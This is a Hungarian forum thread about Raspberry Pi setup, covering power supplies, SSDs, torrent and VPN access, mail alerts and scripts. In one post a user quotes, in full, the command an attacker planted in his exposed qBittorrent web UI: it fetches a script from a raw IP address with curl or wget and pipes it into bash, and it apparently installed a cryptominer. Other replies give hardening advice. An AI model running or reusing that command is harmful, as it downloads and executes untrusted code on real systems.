- Poco M3 - felújított állomás
- Térerő gondok, tapasztalatok
- iPhone topik
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
- Egy szenzor, két zoomkamera: újraírta a Huawei a mobilfotózás történetét
- Google Pixel topik
- Milyen okostelefont vegyek?
- Honor Magic6 Pro - kör közepén számok
- One mobilszolgáltatások
- Olcsó Galaxyk telepíthetik a One UI 7-et
-
Mobilarena
Amit érdemes tudni a Raspberry Pi-kről:
A legelső változat 2012-ben jelent meg. Pici, olcsó és nagyon alacsony fogyasztású, hobby-célú kártyagép. Felépítése ARM alapú, nem PC-architektúra, hanem kb. egy régi mobilhoz hasonló. Nagyon sok mindenre használható! A Linux-nak és a magas eladási mennyiségnek köszönhetően jelentős fejlesztőtáborral rendelkezik.
Új hozzászólás Aktív témák
-
Zsolt_16
tag
válasz
wassermann #45996 üzenetére
Levágtam a sérült részt majd reszelgettem egy óráig mérnöki pontosággal csak így túl vékony így skipeltem
Szerencsére volt egy rövidebb így megoldottam azzal -
wassermann
Topikgazda
válasz
tha_answer #45998 üzenetére
1. nem biztos, hogy túl pontos a belső hőmérő
2. attól még, hogy 2835 mindkettő, biztos meg tudja a szoftver különböztetni őket és másképp kezeli az adott hardvert -
tha_answer
őstag
Boldog pinapot
Rpi es zero w kozt idleben 8-10 celsiusni kulonbseg. Bcm2835 mindketto.
Ofkoz, csak ugyanaz fut rajtuk az egy szem wpad kivetelevel.Wtf?
-
Ma van a Pi nap (3.14), kiváncsi vagyok lesz-e valami bejelentés
-
Zsolt_16
tag
Sziasztok,
Kamerához elszakítottam a szalagkábelt ezt lehet javítani vagy venni kell újat?(hosszra van bőven még)
Nem a 700 ft-on múlik az életem csak ha van rögtönzött megoldás akkor örülnék neki -
Polemius
senior tag
Jól gondolom, hogy egy Pi Zero W-t el kell bírjon egy mezei USB kimenet is?
Konkrétan ha egy VPN szervert akarok csak, akkor az is elég, ha rádugom magára a router usb portjára egy egyszerű usb kábellel? -
Vannak szituációk, amikor hasznos tud lenni.
Pl. én munkahelyen vagyok, feleségem pedig otthon a gyerekkel, és szeretnének nézni valamit. Ilyenkor távolról hozzáadom, és 5 perc múlva már nézhetik is. Ugyanez a megoldás samba megosztással kombózva még életszerűbb, akár az én részemre is adott esetben. Persze mindenkinek mások az igényeik, nekünk így oldottam meg, bevált
-
SunMount3r
nagyúr
válasz
pube111 #45987 üzenetére
Az UPnP, legalábbis a "világháló felé" elve egy elavult és rizikós protokoll. A Port forwarding egy fix port címmel meg neked és torrent kliensednek jobb, ha több/gyorsabb le és feltöltőt akarsz. De lehet egyéb előnyei is lehetnek (én sem vagyok épp egy mindent tudó torrent guru) erről részletesebben a megfelelő Topic-ban (összefoglaló, vagy kérdezz ott).
-
boorit
csendes tag
Sziasztok!
Az lenne a kérdésem, hogy megoldható-e, hogy egy 12V-os PWM ventilátort a raspberry-vel vezéreljek? A 12V-ot kapná külön tápról, csak a vezérlést szeretném a pi-n keresztül megoldani.
-
pube111
senior tag
válasz
SunMount3r #45986 üzenetére
Az miért jobb? Így, hogy upnp + minden indításnál változik az ip, akár azt is lehet, hogy crontabbal naponta újraindítom a programot, és új ip-t használ.
Ha portforward, akkor sosem fog változni az ip, és akkor is nyitva van, ha nem is fut a program. -
pube111
senior tag
A torrent kapcsolatnál bekapcsolva hagytam az upnp-t, mert szerintem mindegy, hogy a port forward endeg neki portot, vagy az upnp. Viszont bepipáltam a "Különböző port használata minden indításnál" opciót.
Így legalább néha változik az ip.
A webes felületnél meg korábban nem vetem észre, hogy ott is van upnp.
Azt ott kikapcsoltam, kapott egy egyedi ip-t, erős jelszót.
Végül is az volt a hiba, hogy a webui upnp be volt kapcsolva, és alap volt a user pass.
Olcsón megúsztam, bejöhetett volna valami ransom is.
Köszi minden help! -
válasz
Fecogame #45980 üzenetére
Jó, értem én hogy fel lehet tupírozni egy szintig, de mi értelme?
Melóhelyen van időd a torrent oldalakat böngészni, és ha nem adod hozzá azonnal összedől a világod?
Elmész nyaralni, és azzal foglalatoskodsz, hogy milyen torrendeket adj hozzá?
Számomra egyik sem életszerű, és inkább a függőséget jelzi. -
válasz
pube111 #45979 üzenetére
Az upnp miatt a WEB-es felületnek is nyitott egy portot. Sokkal jobb, ha te mondod meg a routeren, hogy melyik port legyenek nyitva. Kapcsold ki a routeren az upnp-t, és kézzel add meg a torrent és egyébb szolgáltatások port továbbítását. Így Te tartod kézben a rendszert, és ezzel elkerülhetők az olyan malőrök mint a tiéd.
-
Nem para ez, csak jól kell konfigolni:
- egyedi portszám
- egyedi path az eléréshez
- egyedi felhasználónév
- hosszú jelszó
- mindig a legfrissebb verzióNagyjából ennyi bőven elég is, paranoiásabb userek a fail2bant és a Portscan Protectiont is felrakhatják
-
-
-
Én már azt nem értem, hogy miért kel kitenni az internetre? Most tényleg olyan fontos az, hogy nem ér rá addig amíg hazaérsz?!
Öreg vagyok én már ehhez ... -
pube111
senior tag
megnéztem. bányász lettem.
https://c3pool.com/oldui/en/ -
pube111
senior tag
Történt egy kis baki.
Qbittorrent user/pass alapbeállításon volt.
Egyszer csak jött az email értesítő arról, hogy végzett a kmspico letöltésével.
Én nem indítottam ilyen letöltést. Mostanában mást sem.
Belenéztem a beállításokba, a "Külső program indítása letöltés végeztével" után ez volt beírva:bash -c "(curl -s -L http://15.204.56.5:8000/abcd.sh || wget -O - http://15.204.56.5:8000/abcd.sh) | bash"
Sajnos a commandot értem. Az abcd.sh már nincs a home mappában.
Az lenne a kérdésem, hogy lehet megnézni mit csinált az abcd.sh? -
-
válasz
sztanozs #45958 üzenetére
Dehát ez a leírás a Pi1-re vonatkozik! A Pi2-n 2A-es polyfuse van, ami 2A-nél kezd el melegedni és 4A-nél választ csak le.
Ahhoz, hogy terhelés (rákötött usb eszközök) nélkül idle-ben, tehát 200mA áramfelvétel mellett megjelenjen a figyelmeztetés, 5V táp mellett 0.35V-nak kellene esni a polyfuse-on, ami majdnem 2Ω ellenállást jelent! Ehhez képest az adatlapja alapján egy 2A/6V SMD polyfuse ellenállása 125mΩ.
-
sztanozs
veterán
Az eredeti linken:
The microUSB input port also has a 1.1 A polyfuse (700 mA "hold current") which may also have enough resistance (although much smaller than the 140 mA fuses) to cause a significant voltage drop on the board, even below its 1.1 A total current.Plusz a bejegyzesben hivatkozott polyfuses explained linken:
100 mW polyfuse vs 100 mW load:
If a regular current of something like 100mA runs through it the voltage across the fuse can be something like half a volt. This means that the USB device gets half a volt less, so if the board gets 5.0 Volt, the USB device (when it uses 100mA) gets just 4.5 Volt. Normal 5V logic will not work reliably, as it can tolerate no more than 5% undervoltage (0.25V), so at less than 4.75 Volts the device is being operated below design. Luckily the USB specification orders the manufactures of simple USB devices, such as keyboards and mice, devices that typically work behind a passive HUB (that gets its power from the computer, not from a separate PSU) that they should design their device so that it can work with the voltage behind a hub.
...
The main power input fuse is much less problematic, but it too can misbehave in similar way. -
válasz
J0shu4M1ll3r #45940 üzenetére
Akkor járnál a legjobban, ha egyetlen portot nyitnál meg a routereden a külvilág felé, és az egy VPN szerver lenne, amit mondjuk a pi4-en futtatsz, vagy ha van rá mód, akkor a routeren.
-
válasz
SunMount3r #45952 üzenetére
Készítesz egy kis bash szkriptet. pl.
nano homero.sh
és belemásolod ezt:#!/bin/bash
datum=`date +%F_%H-%M-%S`
echo "Hőmérséklet napló - $(date)" >homero_log_$datum.txt
while :
do
ido=`date +%H:%M:%S`
temp=`/usr/bin/vcgencmd measure_temp`
temp=${temp:5:16}
echo $ido $temp >>homero_log_$datum.txt
echo $ido $temp
sleep 10
done
CTRL+O-val lemented a tartalmát, majd CTRL+X-el kilépsz.
A
chmod +x homero.sh
parancsol futtathatóvá teszed, és már használatra kész, futtathatod:
./homero.shArra figyelj, hogy csak adminként bejelentkezve/futtatva működik.
-
SunMount3r
nagyúr
Hello!
Pi3B+ és Volumio rendszer. Van valami módja annak, hogy visszanézzem, hogy az elmúlt pár órában hogyan változott a CPU hőmérséklete? Nyilván valami SSH-s parancssoros megoldásra gondolok, vagy esteleg log file-ra.
Köszi!
-
-
válasz
J0shu4M1ll3r #45940 üzenetére
Persze hogy nem, hiszen az a port transmission-ra mutat. Ha jól tudom a RealVNC-hez nem kell külön portforward, csak egy RealVNC kliens (de rémlik, hogy WEB-es felületük is van rá). https://manage.realvnc.com
-
sztanozs
veterán
válasz
AiRLAC #45946 üzenetére
Igen, a tap amivel eddig hasznlatam beepitett kabeles, az iPhone es iPad toltokhoz meg kulon kabelt hasznaltam. Sajna mas kabelem vagy tapom nincs itthon, amivel ki tudta volna probalni... Mondjuk ez a tap meg a kabel amit probaltam nem volt hasznalva, mert nincs itthon semmi mas, ami micro usb-vel menne...
-
sztanozs
veterán
válasz
wassermann #45942 üzenetére
Hat sokat nem tudok vele tenni, ha az iPad 10W-os tapja se eleg neki...
#45943 MaCS_70 - mi a gyari tap specifikacioja?
-
válasz
wassermann #45942 üzenetére
Kíváncsiságból én is kipróbáltam, de a RPI2 a gyári táppal simán vitte a legfrissebb OSMC-t. Induláskor van csak a szokásos szivárványos képernyő pár másodpercig.
MaCS
-
sztanozs
veterán
Van itthon egy RPi2B, amit medialejatszonak hasznalok. A hetvegen megprobaltam felrakni ra egy friss OSMC-t, de folyamatosan low-voltage hibauzeneteket dobal es legtobbszor tul sem jut a boot-n. Megprobaltam a sajat toltojevel es egy iphone es egy ipad toltoel is, de ugyanaz az eredmeny. Vegul visszaraktam a masik kartyat, amin valami regi LibreElec van, az viszont megy gond (es hibauzenet) nelkul.
Nem tudjatok mi lehet a gond? -
J0shu4M1ll3r
senior tag
Sziasztok!
Adott egy pi4 amit hálózaton belül vnc-vel elérem és szeretném máshonnan is (külső helyszín) elérni. Emiatt kell valami külön portot forwardolni? Jelenleg a transmission miatt van 1, de vnc remote-hoz is kellene valami spéci?
Megnéztem a publikus ip-m de ha ahhoz hozzáadtam a transmission portot, akkor nem sikerült csatlakozni. -
wmati
addikt
válasz
Fecogame #45938 üzenetére
Eddig a gyári Pi adaptert használtam de most kipróbáltam Macbook töltővel is.
-
wmati
addikt
válasz
Fecogame #45936 üzenetére
Évente cserélni szoktad ? Az a gond hogy már azt is cseréltem, ilyen volt kéznél.
Azt is cseréltemgyári adapterről sima usb-c töltőre, de a hiba így is megmaradt.
-
Nálam ez nagyjából évente előforduló probléma, ott az usb-sata átalakító cseréje mindig megoldja a problémát. Ilyent szoktam venni, az itthoni árak mindig elriasztanak (10e körül vannak).
A másik ami még lehet, az a hálózati adapter és/vagy a kábel.
-
wmati
addikt
Sziasztok,
Van egy Pi4-em usb sata átalakítóval lóg rajta, egy 2.5 Samsung 4TB ssd. A Pi-n plex, sonar, radar, ombi, qbittorrent, jacket, heimdall fut. Ez hibátlanul ment kb 1 évig, viszont egy ideje azt játszuk, hogy a ssd eltünik. Ilyenkor ahova felvan csatolva az a mappa üres lesz, ileltve fdisk -l nem listázza. Újraindítás után megy tovább, fél napig egy napig majd újra eltűnik. Próbáltam cserélni átalakítót, Pi-t, sd kártyát, újratelepítettem másik OS stb de ugyanúgy visszatért a hiba. Egyedül az ssd-t nem cseréltem még, de az elvileg hibátlan.
-
kis.zsolt
aktív tag
válasz
excalibur36 #45927 üzenetére
Pi3 vagy 4 éve megy nonstop (Ubuntu server + Unifi Controller + PiHole), Pi4 pedig 2 éve (HA). Sőt, havernál van egy Pi3 csak unifi kontrollernek RpiOS-sel, ott is ha jól emlékszem majdnem 4 éve megy, még én szereltem fel neki anno. Csak akkor van kikapcsolva, ha elmegy az áram, vagy mikor újrahúzom a rendszert valamiért.
Szóval ezek 0/24-es kütyük szvsz. -
Archttila
veterán
válasz
Amiota megjelent a termek azota 0/24 uzemel
tobbnyire szerverfeladatot lat el (ftp, nfs, qbittorrent-nox, plex) de volt, hogy desktopkent hasznaltam Arch Linux ARM-mal, Sway-jel.
Ezen felul mostansag kalibralashoz is jol jon, mivel bitperfect pattern generatorkent is tökéletesen helytáll. [link] -
betyarr
veterán
válasz
lassan 3 éve van meg a pi4-em,adguard home és unifi controller fut rajta.újabban ezt használom böngészésre,filmezésre.nem sokat volt még kikapcsolva.sztem kutya baja se lesz.
-
excalibur36
senior tag
Sziasztok!
Okoz e valami gondot ha a Pi3-t nem kapcsolom ki hanem folysmatosan üzemben tartom?
Klipper megy rajta. -
válasz
petyus_ #45925 üzenetére
Mert még az is bőven sok, hiszen MaCS_70 táblázata alapján 13A-t is elvisz, és tippem szerint ez a táblázat a házakra vonatkozó szabványok alapján készült, nem a rézkábel valódi terhelhetőségét mutatja meg.
Nézz meg egy 100+ W-os töltést reklámozó USB-C kábelt, hogy milyen "vastag".
Sajna régen sem voltam jó anyagismeretből, de a fiatalabb mérnökök biztos emlékeznek rá, hogyan lehet kiszámolni 1m (réz)kábel terhelhetőségét. Ha itt nem, az elektro topikban biztosan van aki tud segíteni. -
betyarr
veterán
arra van valami lehetőség,hogy a kedvencek automatikusan importálódjanak?nagyon bíztató ez a brave böngésző,de ugye rpi 32 bitre nincs.itt maradnék a vivaldinál,de minden más gépen (munkahelyi gép,teló,meg itthon is van más pc) a bravevel nyomnám az ipart.jó lenne ha valahogy legalább a könyvjelzők automatikusan átkúsznának.
-
petyus_
senior tag
kis.zsolt, Aryes köszönöm a segítséget, de végül úgy döntöttem, veszek egy 5V-os tápot, lehet hogy lesz 1-2 egyéb 5V-os eszköz is, akkor már egyszerűbb így megoldani.
Vezetékezéssel kapcsolatban lenne egy kérdésem. Ha jól gondolom, 3A-hez legalább 0,75mm² vezeték ajánlott, viszont nem tudom erre rá tudom-e krimpelni a csatlakozót, meg beledugni a házba. Van ezzel tapasztalatotok? Esetleg elég kisebb vezeték? (mondjuk a 0,5mm² is nagynak tűnik)
-
válasz
Archttila #45914 üzenetére
apt install msmtp msmtp-mta mailutils -y
nano /etc/msmtprcaccount default
tls on
auth on
host smtp.gmail.com
port 587
user emailcimed@gmail.com
from emailcimed@gmail.com
# https://myaccount.google.com/apppasswords
password stringamitafentioldalkiad
nano /etc/aliasesroot: emailcimed@gmail.com
Fail2ban oldalon semmit se állítottam, így is küldi az email alertet.
-
betyarr
veterán
pi@raspberrypi:~ $ ls -la /etc/apt/sources.list.d
total 32
drwxr-xr-x 2 root root 4096 Mar 3 14:50 .
drwxr-xr-x 9 root root 4096 Feb 27 21:59 ..
-rw-r--r-- 1 root root 141 Mar 3 19:19 brave-browser-release.list
-rw-r--r-- 1 root root 402 Feb 27 22:07 ookla_speedtest-cli.list
-rw-r--r-- 1 root root 75 Feb 25 18:22 raspbian_stretch_for_mongodb.list
-rw-r--r-- 1 root root 191 Feb 21 02:03 raspi.list
-rw-r--r-- 1 root root 1255 Feb 19 20:51 teamviewer.list
-rw-r--r-- 1 root root 187 Feb 25 18:29 vivaldi.list
pi@raspberrypi:~ $ cat /etc/apt/sources.list.d/brave-browser-release.list
deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg arch=arm64] https://brave-browser-apt-release.s3.brave.com/ stable main
pi@raspberrypi:~ $
-
Archttila
veterán
Beallitottam fail2ban-hoz a sendmail-t [link] ami elvileg OK (erzekenyebb adatokat kicsillagoztam)
systemclt status sendmail.service
● sendmail.service - Sendmail Mail Transport Agent
Loaded: loaded (/usr/lib/systemd/system/sendmail.service; enabled; preset: disabled)
Active: active (running) since Sat 2023-03-04 09:20:00 CET; 1min 51s ago
Process: 20200 ExecStartPre=/usr/bin/newaliases (code=exited, status=0/SUCCESS)
Process: 20202 ExecStart=/usr/sbin/sendmail -bd $SENDMAIL_OPTS $SENDMAIL_OPTARG (code=exited, status=0/SUCCESS)
Main PID: 20204 (sendmail)
Tasks: 1 (limit: 4165)
CPU: 147ms
CGroup: /system.slice/sendmail.service
└─20204 "sendmail: accepting connections"
Mar 04 09:20:00 server sendmail[20200]: /etc/mail/aliases: 25 aliases, longest 10 bytes, 279 bytes total
Mar 04 09:20:00 server sm-mta[20204]: starting daemon (8.17.1): SMTP+queueing@00:30:00
Mar 04 09:20:00 server systemd[1]: sendmail.service: Can't open PID file /run/sendmail.pid (yet?) after start: Operation not permitted
Mar 04 09:20:00 server systemd[1]: Started Sendmail Mail Transport Agent.
Mar 04 09:20:00 server sm-mta[20205]: 3248DGQG019996: to=<****d@gmail.com>, ctladdr=<alucard@localhost.localdomain> (1000/1000), delay=00:06:44, xdelay=00:00:00, mailer=esmtp, pri=120301, relay=alt4.gmail-smtp-in.l.google.com. [****], dsn=4.4.1, stat=Deferred: Connection refused by alt4.gmail-smtp-in.l.google.com.
Mar 04 09:20:00 server sm-mta[20205]: 3248FfdO020060: to=<****@gmail.com>, ctladdr=<alucard@localhost.localdomain> (1000/1000), delay=00:04:19, xdelay=00:00:00, mailer=esmtp, pri=120301, relay=alt4.gmail-smtp-in.l.google.com., dsn=4.4.1, stat=Deferred: Connection refused by alt4.gmail-smtp-in.l.google.com.
Mar 04 09:20:21 server sm-mta[20222]: 3248KLJY020222: <test@localhost.localdomain>... User unknown
Mar 04 09:20:21 server sm-mta[20222]: 3248KLJY020222: <subject@localhost.localdomain>... User unknown
Mar 04 09:20:21 server sm-mta[20222]: 3248KLJY020222: from=<alucard@localhost.localdomain>, size=301, class=0, nrcpts=1, msgid=<202303040820.3248KLSp020220@localhost.localdomain>, proto=ESMTP, daemon=MTA, relay=localhost.localdomain [127.0.0.1]
Mar 04 09:20:21 server sm-mta[20224]: 3248KLJY020222: to=<****@gmail.com>, ctladdr=<alucard@localhost.localdomain> (1000/1000), delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=30301, relay=alt4.gmail-smtp-in.l.google.com. [****], dsn=4.4.1, stat=Deferred: Connection refused by alt4.gmail-smtp-in.l.google.com.
viszont ha megpróbálok elkuldeni egy teszt uzenetet, akkor az sajnos nem erkezik meg:
echo "test message" | sendmail 'test subject' linux.alucard@gmail.com
/home/alucard/dead.letter... Saved message in /home/alucard/dead.letter
dead.letter tartalma:
cat dead.letter
From alucard Sat Mar 4 09:28:22 2023
Return-Path: <alucard>
Received: (from alucard@localhost)
by localhost.localdomain (8.17.1/8.17.1/Submit) id 3248SMMN020362;
Sat, 4 Mar 2023 09:28:22 +0100
Date: Sat, 4 Mar 2023 09:28:22 +0100
From: vagyok aki vagyok <alucard>
Message-Id: <202303040828.3248SMMN020362@localhost.localdomain>
test message
Szerintetek mi lehet a problema?
- Raspberry Pi 4
- Majaro ARM minimal -
0519
senior tag
válasz
betyarr #45908 üzenetére
Az üzenet alapján azt mondanám, hogy nem adtad sikeresen hozzá a brave saját szerverét a forrásokhoz, amiből az apt dolgozik.
Ez a rész nem futott le sikeresen:
sudo curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg] https://brave-browser-apt-release.s3.brave.com/ stable main"|sudo tee /etc/apt/sources.list.d/brave-browser-release.list
-
betyarr
veterán
van ez a nagyon új és biztonságos és nagyongyors brave böngésző.szeretném feldobni pi-re,de ő meg nem akarja.
ezek szerint próbálkoztam: [link] meg a hivatalossal is [link]bemásolom a parancsokat,látszólag minden ok,de a végén az installnál ezt a hibát dobja:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package brave-browser -
kis.zsolt
aktív tag
Valóban, az a kis gyűrű csodákra képes. Én egy DSC PIR érzékelőbe is tettem egyet, mikor már olyan messze volt a központtól, hogy a mobiltelefon jelére beindult a riasztás - pedig az árnyékolás is be volt kötve.
Végül az összes vezetéket áthurkoltam (ez 4 madzag volt) a ferritgyűrűn, ami így éppen belefért az érzékelőbe, és tadammm... minden rendbe jött. -
-
kis.zsolt
aktív tag
válasz
petyus_ #45899 üzenetére
A stepdown modulok jellemzője, hogy nagyfrekvenciás tranzienst adhatnak ki, a működési alapelvükből adódóan. Ezek a tranziensek rákerülhetnek az egyenfeszültségre, és bezavarhatnak akár az i2c kommunikációba is.
Ha már megvan ez a Stepdown modul, én 2 dolgot próbálnék ki, mert valójában gombokért megvalósítható:
A stepdown modul kimenetére tennék egy kondit plusz szűrésnek, pl. 100nF...1uF közöttit, plusz egy nagyobb elektrolit kondit, olyan 100-470uF között. Ha isti-biztire akarsz menni, akkor egy pár uH-s tekercs sem árthat, de ezt már sorba kötném a kondi előtti tápra. Mindemellett egy árnyékoló fémdobozba is betenném az egész motyót. -
válasz
petyus_ #45903 üzenetére
Hát menj be egy hobbielektronika boltba, kérd a legnagyobb 16V-os elektrolit kondit, amit tartanak, és nézd meg, hogy befér-e oda, ahová szeretnéd.
Azért 16V-ost, mert 6V-ost nemigen tartanak készleten, de ha van, azt is vehetsz (méretben kisebbek). Polaritással vigyázz, ha fordítva kötöd be, kipukkan (jelölve van rajta a - pólus).
Új hozzászólás Aktív témák
Hirdetés
- Garis Komplett PC eladó!/4060Ti/5600G/16GB/500GB
- BESZÁMÍTÁS! MSI B450 TomaHawk R5 3600 16GB DDR4 512GB SSD RX5500 XT 8GB Rampage SHIVA TT 530W
- Beszámítás! Apple Mac mini 2023 M2 Pro 16GB 512GB SSD számítógép garanciával, hibátlan működéssel
- BESZÁMÍTÁS! MSI B450 R7 7 5700X 32GB DDR4 512GB SSD RTX 2080 8GB Fractal Design Define R5 FSP 750W
- Szerver rack szekrény 42U gurulós zárható 200x100x60
- ÁRGARANCIA!Épített KomPhone Ryzen 7 9800X3D 32/64GB RAM RX 9070 XT 16GB GAMER PC termékbeszámítással
- BESZÁMÍTÁS! ASRock FORMULA OC RX 6900XT 16GB videokártya garanciával hibátlan működéssel
- Samsung Galaxy S22 Ultra 256GB, Kártyafüggetlen, 1 Év Garanciával
- Apple Macbook Pro 13 2020 - M1 - 8GB/256GB SSD - Touch Bar - 102 Ciklus - 99% Akku - Ezüst - MAGYAR
- HP Rack szerverek és tartozékok egyben vagy külön-külön
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft
Város: Budapest
Cég: Liszt Ferenc Zeneművészeti Egyetem
Város: Budapest